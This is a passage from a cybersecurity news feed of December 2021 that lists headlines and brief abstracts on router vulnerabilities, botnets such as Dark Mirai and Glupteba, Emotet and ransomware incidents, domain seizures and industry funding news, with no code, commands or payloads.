At least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices. The most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News. "These devices are both powerful, [and] often highly vulnerable," the researchers noted . "This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more." MikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions. Indeed, earlier this SeptemThe Hacker News
December 9, 2021 – Botnet
Dark Mirai botnet spreads targeting RCE on TP-Link routers Full Text
Abstract
A botnet tracked as Dark Mirai spreads by exploiting a new vulnerability affecting TP-Link TL-WR840N EU V5 home routers. Dark Mirai botnet spreads by exploiting a new vulnerability, tracked as CVE-2021-41653, affecting TP-Link TL-WR840N EU V5 home...Security Affairs
December 09, 2021 – Ransomware
ALPHV BlackCat - This year’s most sophisticated ransomware Full Text
Abstract
The new ALPHV ransomware operation, aka BlackCat, launched last month and could be the most sophisticated ransomware of the year, with a highly-customizable feature set allowing for attacks on a wide range of corporate environments.BleepingComputer
December 9, 2021 – Ransomware
Revived Cerber Targets Confluence and GitLab Servers Full Text
Abstract
Cerber ransomware is active again with new attack tactics. This time it has been observed targeting remote code execution vulnerabilities in Atlassian Confluence and GitLab servers.Cyware Alerts - Hacker News
December 09, 2021 – Education
Why Holidays Put Your Company at Risk of Cyber Attack (And How to Take Precautions) Full Text
Abstract
It is a time when many are thinking of their families and loved ones, time off work, and gift-giving – the holidays. However, while many have their minds outside the realm of work during the holiday season, often, this is when attackers plan their most sinister attacks. So how can you take precautions to protect your organization during these times? Why holidays put your company at risk of cyberattack Attackers today do not have a soft spot for businesses and give companies a break at any time of the year, especially not during holidays. On the contrary, any time of the year where companies may be less prepared to fend off a cyberattack is an opportunity for successful compromise. As a result, the holidays put your company at a higher risk of cyberattack. Most end-users do not think about cybersecurity when surfing the web or receiving emails with holiday deals during the season. As a result, many let their guard down to a certain degree and become preoccupied and distracted mThe Hacker News
December 9, 2021 – Vulnerabilities
Mozilla fixed high-severity bugs in Firefox and Thunderbird mail client Full Text
Abstract
Mozilla released security updates for the Firefox browser and Thunderbird mail client to address multiple vulnerabilities. Mozilla released security updates to address multiple vulnerabilities in the Firefox browser and Thunderbird mail client. The company...Security Affairs
December 09, 2021 – Malware
Malicious Notepad++ installers push StrongPity malware Full Text
Abstract
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.BleepingComputer
December 9, 2021 – Hacker
Microsoft Seizes Malicious Domains Used by Nickel Full Text
Abstract
The Nickel group was using several malicious domains for intelligence gathering from multiple government agencies, think tanks, and human rights organizations worldwide.Cyware Alerts - Hacker News
December 9, 2021 – Hacker
Crooks injects e-skimmers in random WordPress plugins of e-stores Full Text
Abstract
Threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites, Sucuri researchers warn. Sucuri researchers are warning of threat actors injecting credit card swipers into random plugins of e-commerce WordPress sites....Security Affairs
December 09, 2021 – Botnet
Dark Mirai botnet targeting RCE on popular TP-Link router Full Text
Abstract
The botnet known as Dark Mirai (aka MANGA) has been observed exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.BleepingComputer
December 9, 2021 – Hacker
KAX17 Runs Rogue Relays to Expose Tor Users Full Text
Abstract
Researchers stumbled across a mischievous threat actor, dubbed KAX17, running over 900 malicious servers allegedly to deanonymize Tor users. Most of the Tor relay servers used by the group were located in data centers worldwide and were configured as entry and middle points. The recent findings sho ... Read MoreCyware Alerts - Hacker News
December 9, 2021 – Malware
Tens of malicious NPM packages caught hijacking Discord servers Full Text
Abstract
Researches from cybersecurity firm JFrog found 17 malicious packages on the NPM package repository hijacking Discord servers. JFrog researchers have discovered 17 malicious packages in the NPM (Node.js package manager) repository that were developed...Security Affairs
December 09, 2021 – Vulnerabilities
Microsoft, Google OAuth flaws can be abused in phishing attacks Full Text
Abstract
Researchers have discovered a set of previously unknown methods to launch URL redirection attacks against weak OAuth 2.0 implementations.BleepingComputer
December 9, 2021 – Attack
US Food Importer Firm Atalanta Suffers Ransomware Attack Full Text
Abstract
Upon becoming aware of the malicious activity, Atalanta engaged third-party specialists and began to remediate the situation, including conducting a forensic investigation into the incident.The Daily Swig
December 9, 2021 – Botnet
Moobot botnet spreads by exploiting CVE-2021-36260 flaw in Hikvision products Full Text
Abstract
Moobot is a Mirai-based botnet that is leveraging a critical command injection vulnerability in the webserver of some Hikvision products. The Mirai-based Moobot botnet is rapidly spreading by exploiting a critical command injection flaw, tracked...Security Affairs
December 09, 2021 – Solution
Microsoft previews new endpoint security solution for SMBs Full Text
Abstract
Microsoft Defender for Business, a new endpoint security solution specially built for small and medium-sized businesses (SMBs), is now rolling out in preview worldwide.BleepingComputer
December 9, 2021 – Vulnerabilities
Critical web security flaws in Kaseya Unitrends backup appliances remediated after researchers’ disclosure Full Text
Abstract
Each of the flaws (rated with a CVSS score of 9.8) posed a remote code execution risk to Kaseya Unitrends Backup Appliance running vulnerable versions of the software, ranging from 10.0.x-10.5.4.The Daily Swig
December 09, 2021 – Breach
Cox discloses data breach after hacker impersonates support agent Full Text
Abstract
Cox Communications has disclosed a data breach after a hacker impersonated a support agent to gain access to customers' personal information.BleepingComputer
December 9, 2021 – Vulnerabilities
Flaws in Tonga’s top-level domain left Google, Amazon, Tether web services vulnerable to takeover Full Text
Abstract
Palisade researchers discovered an SQL injection vulnerability on the registrar website, abuse of which could enable attackers to obtain the plaintext DNS master passwords for '.to' domains.The Daily Swig
December 09, 2021 – Vulnerabilities
SanDisk SecureAccess bug allows brute forcing vault passwords Full Text
Abstract
Western Digital has fixed a security vulnerability that enabled attackers to brute force SanDisk SecureAccess passwords and access the users' protected files.BleepingComputer
December 9, 2021 – Vulnerabilities
SSRF vulnerability patched in Jamf Pro mobile security platform Full Text
Abstract
A vulnerability in Jamf Pro, a popular MDM platform for Apple devices, allowed attackers to stage SSRF attacks on the application’s servers, security researchers at Assetnote have found.The Daily Swig
December 09, 2021 – Breach
Fujitsu pins Japanese govt data breach on stolen ProjectWEB accounts Full Text
Abstract
Fujitsu says the attackers behind the May data breach used a vulnerability in the company's ProjectWEB information-sharing tool to steal accounts from legitimate users and access proprietary data belonging to multiple Japanese government agencies.BleepingComputer
December 09, 2021 – Vulnerabilities
Hundreds of thousands of MikroTik devices still vulnerable to botnets Full Text
Abstract
Approximately 300,000 MikroTik routers are vulnerable to critical vulnerabilities that malware botnets can exploit for cryptomining and DDoS attacks.BleepingComputer
December 09, 2021 – Vulnerabilities
Windows ‘InstallerFileTakeOver’ zero-day bug gets free micropatch Full Text
Abstract
An unofficial patch is available for a zero-day vulnerability that is actively exploited in the wild to gain administrator privileges.BleepingComputer
December 9, 2021 – Breach
Microsoft Vancouver leaking website credentials via overlooked DS_STORE file Full Text
Abstract
CyberNews researchers discovered a Desktop Services Store (DS_STORE) file left on a publicly accessible web server that belongs to Microsoft Vancouver. Original post @ https://cybernews.com/security/microsoft-vancouver-leaking-website-credentials-via-overlooked-ds-store-file/ The...Security Affairs
December 08, 2021 – Solution
Microsoft: Secured-core servers help prevent ransomware attacks Full Text
Abstract
Microsoft says the first Secured-core certified Windows Server and Microsoft Azure Stack HCI devices are now available to protect customers' networks from security threats, including ransomware attacks.BleepingComputer
December 8, 2021 – Business
Private Equity Firm Permira to Acquire Mimecast in $5.8 Billion Deal Full Text
Abstract
Mimecast on Tuesday announced that private equity firm Permira wants to acquire it in an all-cash transaction that values the email security company at roughly $5.8 billion.Security Week
December 08, 2021 – Botnet
Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers Full Text
Abstract
Google on Tuesday said it took steps to disrupt the operations of a sophisticated "multi-component" botnet called Glupteba that approximately infected more than one million Windows computers across the globe and stored its command-and-control server addresses on Bitcoin's blockchain as a resilience mechanism. As part of the efforts, Google's Threat Analysis Group (TAG) said it partnered with the CyberCrime Investigation Group over the past year to terminate around 63 million Google Docs that were observed to have distributed the malware, alongside 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts that were associated with its distribution. Google TAG said it worked with internet infrastructure providers and hosting providers, such as CloudFlare, to dismantle the malware by taking down servers and placing interstitial warning pages in front of the malicious domains. In tandem, the internet giant also announced a lawsuit against two Russian indiThe Hacker News
December 8, 2021 – General
Not with a Bang but a Whisper: The Shift to Stealthy C2 Full Text
Abstract
DoH! Nate Warfield, CTO of Prevailion, discusses new stealth tactics threat actors are using for C2, including Malleable C2 from Cobalt Strike’s arsenal.Threatpost
December 08, 2021 – Hacker
Hackers infect random WordPress plugins to steal credit cards Full Text
Abstract
Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.BleepingComputer
December 8, 2021 – Malware
Emotet Needs No Intermediate Trojan, Drops Cobalt Strike Beacons Directly Full Text
Abstract
Conventionally, Emotet would install either TrickBot or Qbot on compromised devices. These trojans would eventually install Cobalt Strike. Now, it has changed its tactics.Cyware Alerts - Hacker News
December 08, 2021 – Botnet
140,000 Reasons Why Emotet is Piggybacking on TrickBot in its Return from the Dead Full Text
Abstract
The operators of TrickBot malware have infected an estimated 140,000 victims across 149 countries a little over a year after attempts were to dismantle its infrastructure, even as the malware is fast becoming an entry point for Emotet, another botnet that was taken down at the start of 2021. Most of the victims detected since November 1, 2020, are from Portugal (18%), the U.S. (14%), and India (5%), followed by Brazil (4%), Turkey (3%), Russia (3%), and China (3%), Check Point Research noted in a report shared with The Hacker News, with government, finance, and manufacturing entities emerging the top affected industry verticals. "Emotet is a strong indicator of future ransomware attacks, as the malware provides ransomware gangs a backdoor into compromised machines," said the researchers, who detected 223 different Trickbot campaigns over the course of the last six months. Both TrickBot and Emotet are botnets, which are a network of internet-connected devices infected byThe Hacker News
December 8, 2021 – Vulnerabilities
SonicWall strongly urges customers to apply patches to SMA 100 devices Full Text
Abstract
SonicWall strongly urges customers using SMA 100 series appliances to install security patches that address multiple security flaws, some of them rated as critical. Security vendor SonicWall urges customers using SMA 100 series appliances to apply...Security Affairs
December 8, 2021 – Ransomware
Emotet’s Behavior & Spread Are Omens of Ransomware Attacks Full Text
Abstract
The botnet, which resurfaced last month on the back of TrickBot, can now directly install Cobalt Strike on infected devices, giving threat actors direct access to targets.Threatpost
December 08, 2021 – Hacker
XE Group exposed for eight years of hacking, credit card theft Full Text
Abstract
A relatively unknown group of Vietnamese hackers calling themselves 'XE Group' has been linked to eight years of for-profit hacking and credit card skimming.BleepingComputer
December 8, 2021 – Business
Claroty raises $400 million to fund Medigate acquisition Full Text
Abstract
Israeli security firm Claroty is raising $400 million in a Series E round led by SoftBank. The fresh funding will be used to acquire Medigate, which specializes in protecting medical infrastructure.Calcalis Tech
December 08, 2021 – Education
[eBook] Guide to Achieving 24x7 Threat Monitoring and Response for Lean IT Security Teams Full Text
Abstract
If there is one thing the past few years have taught the world, it's that cybercrime never sleeps. For organizations of any size and scope, having around-the-clock protection for their endpoints, networks, and servers is no longer optional, but it's also not entirely feasible for many. Attackers are better than ever at slipping in undetected, and threats are constantly evolving. Teams can't afford to take a minute off, but they also can't manage the massive security necessary to defend most organizations. A new eBook by XDR provider Cynet ( download here ) breaks down this challenge and offers some solutions for lean security teams looking for ways to improve their detection and response capabilities. The guide strikes an optimistic tone for lean IT security teams. Though the challenges are expansive – including talent shortages, an ever-expanding threat surface, and rising security tool prices – organizations can still find smart and effective ways to stay protected 24x7. Why 2The Hacker News
December 8, 2021 – Attack
CS Energy foiled a ransomware attack Full Text
Abstract
A cyberattack hit CS Energy in Australia on Saturday, November 27, experts believe the attack was orchestrated by Chinese hackers. A ransomware cyberattack hit a major energy network operated by CS Energy, that attack could have had dramatic consequences...Security Affairs
December 08, 2021 – Privacy
Tor’s main site blocked in Russia as censorship widens Full Text
Abstract
The Tor Project's main website, torproject.org, is actively blocked by Russia's largest internet service providers, and sources from the country claim that the government is getting ready to conduct an extensive block of the project.BleepingComputer
December 8, 2021 – Vulnerabilities
Salt Security Report Surfaces GraphQL API Vulnerabilities Full Text
Abstract
Salt Security today released a report highlighting a vulnerability its researchers discovered in an API based on the GraphQL specification implemented by an undisclosed financial services firm.Security Boulevard
December 8, 2021 – Malware
Emotet directly drops Cobalt Strike beacons without intermediate Trojans Full Text
Abstract
The Emotet malware continues to evolve, in the latest attacks, it directly installs Cobalt Strike beacons to give the attackers access to the target network. Emotet malware now directly installs Cobalt Strike beacons to give the attackers immediate...Security Affairs
December 08, 2021 – Vulnerabilities
SonicWall ‘strongly urges’ customers to patch critical SMA 100 bugs Full Text
Abstract
SonicWall 'strongly urges' organizations using SMA 100 series appliances to immediately patch them against multiple security flaws rated with CVSS scores ranging from medium to critical.BleepingComputer
December 8, 2021 – Botnet
Identity Verification Company Incode Raises $220 Million at $1.25 Billion Valuation Full Text
Abstract
The funding round was led by General Atlantic and SoftBank, but Capital One Ventures, Coinbase Ventures, J.P. Morgan, and SVCI also participated, along with other existing investors.Security Week
December 08, 2021 – Botnet
Moobot botnet spreading via Hikvision camera vulnerability Full Text
Abstract
A Mirai-based botnet called 'Moobot' is spreading aggressively via exploiting a critical command injection flaw in the webserver of many Hikvision products.BleepingComputer
December 8, 2021 – Vulnerabilities
Android Security Updates Patch 46 Vulnerabilities Full Text
Abstract
The most severe of the fixed issues is an information leakage bug in the Media framework “that could lead to remote information disclosure with no additional execution privileges needed,” Google said.Security Week
December 8, 2021 – Criminals
Canadian indicted for launching ransomware attacks on orgs in US, Canada Full Text
Abstract
The FBI and Justice Department unsealed indictments today leveling a number of charges against 31-year-old Canadian Matthew Philbert for his alleged involvement in several ransomware attacks.ZDNet
December 7, 2021 – Vulnerabilities
Windows 10 Drive-By RCE Triggered by Default URI Handler Full Text
Abstract
There’s an argument injection weakness in the Windows 10/11 default handler, researchers said: an issue that Microsoft has only partially fixed.Threatpost
December 07, 2021 – Cryptocurrency
Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices Full Text
Abstract
Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the total CPU usage," the Taiwanese company said in an alert. "This process mimics a kernel process but its [process identifier] is usually greater than 1000." QNAP said it's currently investigating the infections, but did not share more information on the initial access vector that's being used to compromise the NAS devices. Affected users can remove the malware by restarting the appliances. In the interim, the company is recommending that users update their QTS (and QuTS Hero) operating systems to the latest version, enforce strong passwords for administrThe Hacker News
December 7, 2021 – Phishing
When Scammers Get Scammed, They Take It to Cybercrime Court Full Text
Abstract
Underground arbitration system settles disputes between cybercriminals.Threatpost
December 7, 2021 – Business
Google Takes Down Glupteba Botnet; Files Lawsuit Against Operators Full Text
Abstract
The malware’s unique blockchain-enabled backup C2 scheme makes it difficult to eliminate completely.Threatpost
December 07, 2021 – Malware
Emotet now drops Cobalt Strike, fast forwards ransomware attacks Full Text
Abstract
In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent.BleepingComputer
December 7, 2021 – Phishing
Persuasive Phishing Attacks Use Fake Office365 Spam Alerts Full Text
Abstract
Microsoft has always been the target of phishing attacks. A new wave of phishing attacks is using fake Office 365 notifications with an aim to steal victims’ Microsoft credentials.Cyware Alerts - Hacker News
December 07, 2021 – Government
Language requiring companies to report cyberattacks left out of defense bill Full Text
Abstract
Legislation mandating cyber incident reporting for certain critical organizations was left out of the compromise version of the annual National Defense Authorization Act (NDAA) that the House is set to vote on Tuesday.The Hill
December 07, 2021 – Vulnerabilities
Eltima SDK Contain Multiple Vulnerabilities Affecting Several Cloud Service Provides Full Text
Abstract
Cybersecurity researchers have disclosed multiple vulnerabilities in a third-party driver software developed by Eltima that have been "unwittingly inherited" by cloud desktop solutions like Amazon Workspaces, Accops, and NoMachine and could provide attackers a path to perform an array of malicious activities. "These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded," SentinelOne researchers said in a report shared with The Hacker News. The flaws have since been addressed in Amazon Nimble Studio AMI, Amazon NICE DCV, Amazon WorkSpaces, Amazon AppStream, NoMachine, Accops HyWorks, Accops HyWorks DVM Tools, Eltima USB Network Gate, Amzetta zPortal Windows zClient, Amzetta zPortal DVM Tools, FlexiHub, and Donglify. At its core, the issues reside in a product developed by Eltima that offers "USB over Ethernet&quThe Hacker News
December 7, 2021 – Botnet
Google disrupts the Glupteba botnet Full Text
Abstract
Google announced to have disrupted the Glupteba botnet, a huge infrastructure composed of more than 1 million Windows PCs worldwide. Google announced to have taken down the infrastructure operated by the Glupteba, it also sued Russian nationals Dmitry...Security Affairs
December 07, 2021 – Vulnerabilities
Grafana fixes zero-day vulnerability after exploits spread over Twitter Full Text
Abstract
Open-source analytics and interactive visualization solution Grafana received an emergency update today to fix a high-severity, zero-day vulnerability that enabled remote access to local files.BleepingComputer
December 7, 2021 – Business
GitGuardian Raises $44 Million to Create Code Security Platform Full Text
Abstract
GitGuardian raised $44 million in Series B funding, bringing the total funds raised to $56 million. The round was led by Eurazeo, with participation from Sapphire, Balderton, BPI, and Fly Ventures.Security Week
December 07, 2021 – Botnet
Google files lawsuit against Russian hackers as part of disrupting botnet Full Text
Abstract
Google on Tuesday announced it is pursuing litigation to disrupt a botnet run by operators based out of Russia, among other steps meant to crack down on the group.The Hill
December 07, 2021 – Hacker
SolarWinds Hackers Targeting Government and Business Entities Worldwide Full Text
Abstract
Nobelium, the threat actor attributed to the massive SolarWinds supply chain compromise, has been once again linked to a series of attacks targeting multiple cloud solution providers, services, and reseller companies, as the hacking group continues to refine and retool its tactics at an alarming pace in response to public disclosures. The intrusions, which are being tracked by Mandiant under two different activity clusters UNC3004 and UNC2652, are both associated with UNC2452, an uncategorized threat group that has since been tied to the Russian intelligence service. UNC2652, in particular, has been observed targeting diplomatic entities with phishing emails containing HTML attachments with malicious JavaScript, ultimately dropping a Cobalt Strike Beacon onto the infected devices. "In most instances, post compromise activity included theft of data relevant to Russian interests," Mandiant researchers Luke Jenkins, Sarah Hawley, Parnian Najafi, and Doug Bienstock said inThe Hacker News
December 7, 2021 – Cryptocurrency
Bitcoin Miner [oom_reaper] targets QNAP NAS devices Full Text
Abstract
Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices,...Security Affairs
December 07, 2021 – Criminals
Alleged ransomware affiliate arrested for healthcare attacks Full Text
Abstract
A 31-year old Canadian national has been charged in connection to ransomware attacks against organizations in the United States and Canada, a federal indictment unsealed today shows.BleepingComputer
December 7, 2021 – Malware
How DopplePaymer Hunts & Kills Windows Processes Full Text
Abstract
DoppelPaymer hijacks ProcessHacker and exploits KProcessHacker to kill a list of processes, including both antivirus (AV) and endpoint detection and response (EDR) applications.Crowdstrike
December 07, 2021 – Covid-19
Hackers using omicron, COVID-19 phishing emails to target universities Full Text
Abstract
Threat actors are increasingly using phishing emails related to the COVID-19 pandemic and the new omicron variant to target universities and steal login credentials, new research published Tuesday found.The Hill
December 07, 2021 – Hacker
Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers Full Text
Abstract
Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia. The Redmond company attributed the malicious activities to a group it pursues as Nickel , and by the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012. "Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said . "There is often a correlation between Nickel's targets and China's geopolitical intThe Hacker News
December 7, 2021 – APT
Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group Full Text
Abstract
Microsoft seized dozens of malicious domains used by the China-linked APT15 group to target organizations worldwide. Microsoft announced to have obtained a court warrant that allowed it to seize 42 domains used by a China-linked APT15 group (aka Nickel,...Security Affairs
December 07, 2021 – Attack
US universities targeted by Office 365 phishing attacks Full Text
Abstract
US universities are being targeted in multiple phishing attacks designed to impersonate college login portals to steal valuable Office 365 credentials.BleepingComputer
December 7, 2021 – Government
NSA Funding Cybersecurity Workforce Training Programs Full Text
Abstract
Iowa State University and the University of Illinois at Urbana-Champaign will lead a coalition of industry and government partners to train professionals to grow the Midwest's cybersecurity workforce.Government Technology
December 7, 2021 – APT
Nobelium continues to target organizations worldwide with custom malware Full Text
Abstract
Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked UNC3004 and UNC2652, that were associated with...Security Affairs
December 07, 2021 – Ransomware
New Cerber ransomware targets Confluence and GitLab servers Full Text
Abstract
Cerber ransomware is back, as a new ransomware family adopts the old name and targets Atlassian Confluence and GitLab servers using remote code execution vulnerabilities.BleepingComputer
December 7, 2021 – Cryptocurrency
QNAP warns of new crypto-miner targeting its NAS devices Full Text
Abstract
Taiwanese hardware vendor QNAP has released a new security advisory today warning users that a new strain of crypto-mining malware is targeting its network-attached storage (NAS) devices.The Record
December 07, 2021 – Policy and Law
Google disrupts massive Glupteba botnet, sues Russian operators Full Text
Abstract
Google announced today that it has taken action to disrupt the Glupteba botnet that now controls more than 1 million Windows PCs around the world, growing by thousands of new infected devices each day.BleepingComputer
December 7, 2021 – Breach
LINE Pay Exposed Japanese, Taiwanese, and Thai Users’ Payment Data on GitHub Full Text
Abstract
Smartphone payment provider LINE Pay announced yesterday that around 133,000 users' payment details were mistakenly published on GitHub between September and November of this year.The Register
December 07, 2021 – Vulnerabilities
27 flaws in USB-over-network SDK affect millions of cloud users Full Text
Abstract
Researchers have discovered 27 vulnerabilities in Eltima SDK, a library used by numerous cloud providers to remotely mount a local USB device.BleepingComputer
December 7, 2021 – APT
French Organizations Under Attack from Russia-linked Nobelium APT Group Full Text
Abstract
The state-sponsored hackers have compromised the email accounts belonging to French organizations and used them to orchestrate spear-phishing campaigns aimed at foreign institutions.Security Affairs
December 07, 2021 – Solution
STOP Ransomware vaccine released to block encryption Full Text
Abstract
German security software company G DATA has released a vaccine that will block STOP Ransomware from encrypting victims' files after infection.BleepingComputer
December 07, 2021 – Vulnerabilities
QNAP warns users of bitcoin miner targeting their NAS devices Full Text
Abstract
QNAP warned customers today of ongoing attacks targeting their NAS (network-attached storage) devices with cryptomining malware, urging them to take measures to protect them immediately.BleepingComputer
December 07, 2021 – Cryptocurrency
Twitter bots pose as support staff to steal your cryptocurrency Full Text
Abstract
Scammers monitor every tweet containing requests for support on MetaMask, TrustWallet, and other popular crypto wallets, and respond to them with scam links in just seconds.BleepingComputer
December 07, 2021 – Attack
Nordic Choice Hotels hit by Conti ransomware, no ransom demand yet Full Text
Abstract
Nordic Choice Hotels has now confirmed a cyber attack on its systems from the Conti ransomware group. Although there is no indication of card or payment information being affected, information pertaining to guest bookings was potentially leaked.BleepingComputer
December 6, 2021 – Criminals
Cuba Ransomware Gang Hauls in $44M in Payouts Full Text
Abstract
The gang is using a variety of tools and malware to carry out attacks in volume on critical sectors, the FBI warned.Threatpost
December 6, 2021 – Privacy
Pegasus Spyware Infects U.S. State Department iPhones Full Text
Abstract
It’s unknown who’s behind the cyberattacks against at least nine employees’ iPhones, who are all involved in Ugandan diplomacy.Threatpost
December 06, 2021 – Solution
Latest Firefox 95 Includes RLBox Sandboxing to Protect Browser from Malicious Code Full Text
Abstract
Mozilla is beginning to roll out Firefox 95 with a new sandboxing technology called RLBox that prevents untrusted code and other security vulnerabilities from causing "accidental defects as well as supply-chain attacks." Dubbed " RLBox " and implemented in collaboration with researchers at the University of California San Diego and the University of Texas, the improved protection mechanism is designed to harden the web browser against potential weaknesses in off-the-shelf libraries used to render audio, video, fonts, images, and other content. To that end, Mozilla is incorporating "fine-grained sandboxing" into five modules, including its Graphite font rendering engine, Hunspell spell checker, Ogg multimedia container format, Expat XML parser, and Woff2 web font compression format. The framework uses WebAssembly , an open standard that defines a portable binary-code format for executable programs that can be run on modern web browsers, to iThe Hacker News
December 06, 2021 – APT
Microsoft seizes sites used by APT15 Chinese state hackers Full Text
Abstract
Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.BleepingComputer
December 6, 2021 – Vulnerabilities
Kafdrop flaw allows data from Kafka clusters to be exposed Internet-wide Full Text
Abstract
Researchers at Spectral discovered a security flaw in Kafdrop, a popular open-source UI and management interface for Apache Kafka clusters, that has been downloaded more than 20 million times.Help Net Security
December 06, 2021 – Hacker
Russian group behind SolarWinds incident ramping up hacking efforts, analysis says Full Text
Abstract
The Russian government-linked hacking group behind one of the biggest cyber espionage incidents in U.S. history has only intensified its hacking efforts in the year since, research released Monday found.The Hill
December 06, 2021 – Cryptocurrency
Malicious KMSPico Windows Activator Stealing Users’ Cryptocurrency Wallets Full Text
Abstract
Users looking to activate Windows without using a digital license or a product key are being targeted by tainted installers to deploy malware designed to plunder credentials and other information in cryptocurrency wallets. The malware, dubbed " CryptBot ," is an information stealer capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies, credit cards, and capturing screenshots from the infected systems. Deployed via cracked software, the latest attack involves the malware masquerading as KMSPico. KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office suite without actually owning a license key. "The user becomes infected by clicking one of the malicious links and downloading either KMSPico, Cryptbot, or another malware without KMSPico," Red Canary researcher Tony Lambert said in a report published last week. "The adversariesThe Hacker News
December 6, 2021 – Education
How Crowd-Forecasting Might Decrease the Cybersecurity Knowledge Deficit Full Text
Abstract
Can we apply the techniques of crowd-forecasting for better cybersecurity?Lawfare
December 6, 2021 – APT
Nobelium APT targets French orgs, French ANSSI agency warns Full Text
Abstract
The French cyber-security agency ANSSI said that the Russia-linked Nobelium APT group has been targeting French organizations since February 2021. The French national cybersecurity agency ANSSI (Agence Nationale de la Sécurité des Systèmes d'Information)...Security Affairs
December 6, 2021 – Cryptocurrency
Crypto-Exchange BitMart to Pay Users for $200M Theft Full Text
Abstract
BitMart confirmed it had been drained of ~$150 million in cryptocurrency assets, but a blockchain security firm said it’s closer to $200 million.Threatpost
December 06, 2021 – Privacy
France warns of Nobelium cyberspies attacking French orgs Full Text
Abstract
The French national cyber-security agency ANSSI said today that the Russian-backed Nobelium hacking group behind last year's SolarWinds hack has been targeting French organizations since February 2021.BleepingComputer
December 6, 2021 – Vulnerabilities
Critical vulnerabilities in open source forum software NodeBB could lead to RCE Full Text
Abstract
Critical vulnerabilities in the JavaScript-based open source forum platform NodeBB could allow attackers to steal private information and access admin accounts, researchers have warned.The Daily Swig
December 06, 2021 – Hacker
Microsoft disrupts Chinese hacking group targeting organizations in dozens of countries Full Text
Abstract
Microsoft on Monday announced that a federal court had granted a request to allow the company to seize websites being used by a Chinese based hacking group that were targeting organizations in the United States and 28 other nations.The Hill
December 06, 2021 – Education
Vulnerability Scanning Frequency Best Practices Full Text
Abstract
So you've decided to set up a vulnerability scanning programme, great. That's one of the best ways to avoid data breaches. How often you should run your scans, though, isn't such a simple question. The answers aren't the same for every type of organization or every type of system you're scanning. This guide will help you understand the questions you should be asking and help you come up with the answers that are right for you. How often should vulnerability scans be run A lot of the advice below depends on what exactly you're scanning. If you're not sure about that yet - check out this comprehensive vulnerability scanning guide . Once you've decided which systems should be in scope, and what type of scanner you need, you're ready to start scanning. So how often should you ideally be running vulnerability scans? Here are five strategies to consider, and we'll discuss in which scenarios they work best: Change-based Hygiene-based ComplianThe Hacker News
December 6, 2021 – Government
How the President Can Shape the Role and Oversight of the National Cyber Director Full Text
Abstract
The national cyber director’s lack of independent legal authority, combined with Senate confirmation, gives the president broad latitude to shape this role and authority within the executive branch.Lawfare
December 6, 2021 – Attack
330 SPAR stores close or switch to cash-only payments after a cyberattack Full Text
Abstract
A cyber attack hit the international supermarket franchise SPAR forcing 330 shops in North East England to shut down. A cyberattack hit the international supermarket franchise SPAR impacting the operations at 330 shops in North East England. Many...Security Affairs
December 6, 2021 – General
Are You Guilty of These 8 Network-Security Bad Practices? Full Text
Abstract
Tony Lauro, director of Security Technology & Strategy at Akamai, discusses VPNs, RDP, flat networks, BYOD and other network-security bugbears.Threatpost
December 06, 2021 – Outage
Hundreds of SPAR stores shut down, switch to cash after cyberattack Full Text
Abstract
Approximately 330 SPAR shops in northern England face severe operational problems following a weekend cyberattack, forcing many stores to close or switch to cash-only payments.BleepingComputer
December 6, 2021 – Cryptocurrency
Malicious Version of KMSPico Windows Activator Used to Steal Users’ Cryptocurrency Wallets Full Text
Abstract
Red Canary noted that it’s not just individuals who use KMSPico to fraudulently activate Windows as it has also noticed various IT departments using the tool which makes it a big threat in such cases.Neowin
December 06, 2021 – Government
Israel tightening cyber exports after scandals Full Text
Abstract
Israel is tightening its guidelines for cyber exports following a number of incidents linked to the Israeli spyware company NSO Group.The Hill
December 06, 2021 – Criminals
Hackers Steal $200 Million Worth of Cryptocurrency Tokens from BitMart Exchange Full Text
Abstract
